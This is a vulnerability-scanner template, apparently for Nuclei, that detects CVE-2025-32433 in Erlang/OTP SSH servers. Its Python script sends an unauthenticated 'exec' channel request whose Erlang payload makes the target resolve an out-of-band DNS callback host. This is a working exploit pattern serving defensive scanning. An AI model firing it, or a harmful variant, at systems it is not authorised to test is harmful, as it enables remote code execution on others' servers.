id: CVE-2025-32433

info:
  name: Erlang/OTP SSH - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,darses
  severity: critical
  description: |
    Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials.
  impact: |
    Unauthenticated attackers can execute arbitrary code or commands through specially crafted SSH protocol requests sent to Erlang/OTP SSH servers.
  remediation: |
    This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or preventing access via firewall rules.
  reference:
    - https://platformsecurity.com/blog/CVE-2025-32433-poc
    - https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12
    - https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f
    - https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891
    - https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-32433
    cwe-id: CWE-306
    epss-score: 0.59722
    epss-percentile: 0.98289
  metadata:
    verified: true
    max-request: 1
    shodan-query: "Erlang OTP"
  tags: cve,cve2025,erlang,otp,ssh,rce,oast,kev,vkev,vuln

variables:
  OAST: "{{interactsh-url}}"

code:
  - engine:
      - py
      - python3
    source: |
      import binascii
      import os
      import socket
      import struct
      import time

      # Target coordinates are read from the environment of the script process.
      HOST = os.getenv('Host')
      PORT = os.getenv('Port')

      # RFC 4253 section 6.1 only requires implementations to handle packets of
      # up to 35000 bytes; a larger advertised length is treated as stream
      # corruption instead of being trusted for a read.
      MAX_PACKET_SIZE = 35000
      # RFC 4253 section 4.2 limits the identification string to 255 characters.
      MAX_BANNER_LENGTH = 255
      # Seconds to wait for the TCP connect and for the banner read, so an
      # unresponsive host cannot block the script forever.
      CONNECT_TIMEOUT = 10


      def hexdump(data):
          """Return the bytes of data as space-separated two-digit hex values."""
          return ' '.join([f'{b:02x}' for b in data])


      def string_payload(s):
          """Encode s as an SSH string: 4-byte big-endian length, then UTF-8 bytes."""
          s_bytes = s.encode("utf-8")
          return struct.pack(">I", len(s_bytes)) + s_bytes


      def build_packet(payload):
          """Wrap payload in an unencrypted SSH binary packet.

          Layout: uint32 packet_length, one byte padding_length, payload, padding.
          The padding makes the total size a multiple of 8 and is at least
          4 bytes long; zero bytes are used as padding.
          """
          padding_length = 8 - ((len(payload) + 5) % 8)
          if padding_length < 4:
              padding_length += 8
          # packet_length counts the padding_length byte, payload and padding,
          # but not the length field itself.
          packet_length = len(payload) + padding_length + 1
          return (
              struct.pack(">I", packet_length)
              + bytes([padding_length])
              + payload
              + b"\x00" * padding_length
          )


      def build_channel_open(channel_id=0):
          """Build a channel-open packet (message type 0x5a) for a "session" channel."""
          return build_packet(
              b"\x5a"
              + string_payload("session")
              + struct.pack(">I", channel_id)   # sender channel
              + struct.pack(">I", 0x100000)     # initial window size
              + struct.pack(">I", 0x8000)       # maximum packet size
          )


      def build_channel_request(channel_id=0, command=""):
          """Build a channel-request packet (message type 0x62) of type "exec".

          The want-reply flag is set (0x01) and command is sent as the request data.
          """
          return build_packet(
              b"\x62"
              + struct.pack(">I", channel_id)
              + string_payload("exec")
              + b"\x01"
              + string_payload(command)
          )


      def build_kexinit():
          """Build a KEXINIT packet (message type 0x14) with a fixed algorithm set."""
          cookie = b"\x00" * 16
          kex_algorithms = ["curve25519-sha256@libssh.org", "diffie-hellman-group14-sha1"]
          host_key_algorithms = ["ssh-rsa", "rsa-sha2-512", "rsa-sha2-256"]
          ciphers = ["aes128-ctr"]
          macs = ["hmac-sha1"]
          compression = ["none"]
          # Ciphers, MACs and compression are each listed twice: once per
          # direction (client-to-server, server-to-client).
          payload = (
              b"\x14"
              + cookie
              + string_payload(",".join(kex_algorithms))
              + string_payload(",".join(host_key_algorithms))
              + string_payload(",".join(ciphers))
              + string_payload(",".join(ciphers))
              + string_payload(",".join(macs))
              + string_payload(",".join(macs))
              + string_payload(",".join(compression))
              + string_payload(",".join(compression))
              + string_payload("")              # languages client-to-server
              + string_payload("")              # languages server-to-client
              + b"\x00"                         # first_kex_packet_follows
              + struct.pack(">I", 0)            # reserved
          )
          return build_packet(payload)


      def recv_exact(sock, count):
          """Read exactly count bytes from sock.

          socket.recv may return fewer bytes than requested, so keep reading
          until the full amount has arrived. Returns None if the peer closes the
          connection first.
          """
          chunks = []
          remaining = count
          while remaining > 0:
              chunk = sock.recv(remaining)
              if not chunk:
                  return None
              chunks.append(chunk)
              remaining -= len(chunk)
          return b"".join(chunks)


      def read_banner(sock, limit=MAX_BANNER_LENGTH):
          """Read the server identification line, stopping right after the LF.

          Reading byte by byte avoids consuming the start of the binary packet
          that the server may send immediately after its banner.
          """
          line = bytearray()
          while len(line) < limit:
              byte = sock.recv(1)
              if not byte:
                  break
              line += byte
              if byte == b"\n":
                  break
          return bytes(line)


      def receive_packet(sock, timeout=5):
          """Receive one length-prefixed packet body from sock.

          Returns the bytes following the 4-byte length field, or None on
          timeout, closed connection, implausible length, or any other error.
          """
          sock.settimeout(timeout)
          try:
              size_data = recv_exact(sock, 4)
              if size_data is None:
                  return None
              packet_size = struct.unpack(">I", size_data)[0]
              if packet_size > MAX_PACKET_SIZE:
                  print(f"[!] Error receiving packet: implausible packet length {packet_size}")
                  return None
              return recv_exact(sock, packet_size)
          except socket.timeout:
              print("[!] Timeout waiting for response")
              return None
          except Exception as e:
              print(f"[!] Error receiving packet: {e}")
              return None


      try:
          with socket.create_connection((HOST, PORT), timeout=CONNECT_TIMEOUT) as s:
              print("[*] Connecting to SSH server...")

              # Send initial SSH version with specific version string
              version = b"SSH-2.0-OpenSSH_7.4\r\n"
              s.sendall(version)
              read_banner(s)

              s.sendall(build_kexinit())
              response = receive_packet(s)
              if response:
                  print("[+] Received KEXINIT response")

              print("[*] Sending channel_open...")
              s.sendall(build_channel_open())
              response = receive_packet(s)
              if response:
                  print("[+] Channel opened successfully")

              time.sleep(1)

              # Try different payload formats
              payloads = [
                  'inet:gethostbyname("' + os.getenv('OAST') + '").'
              ]

              for payload in payloads:
                  print(f"[*] Trying payload: {payload}")
                  s.sendall(build_channel_request(command=payload))
                  response = receive_packet(s)
                  if response:
                      print(f"[+] Response received for payload: {payload}")
                  time.sleep(1)

              print("[*] Exploit attempt completed")

      except Exception as e:
          print(f"[!] Error during exploitation: {e}")

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# NOTE(review): the digest below was computed over the previous template body; re-sign the template after applying these edits.
# digest: 4b0a00483046022100d77437ae3646473876df0b3ab3ef476e7a9fbd420a41bd5f2114462f3dcca898022100e5c8742b1ad73baa5254db4259a1598cea122b5f24a97678bfaedbd4ac7703ae:922c64590222798bb761d5b6d8e72950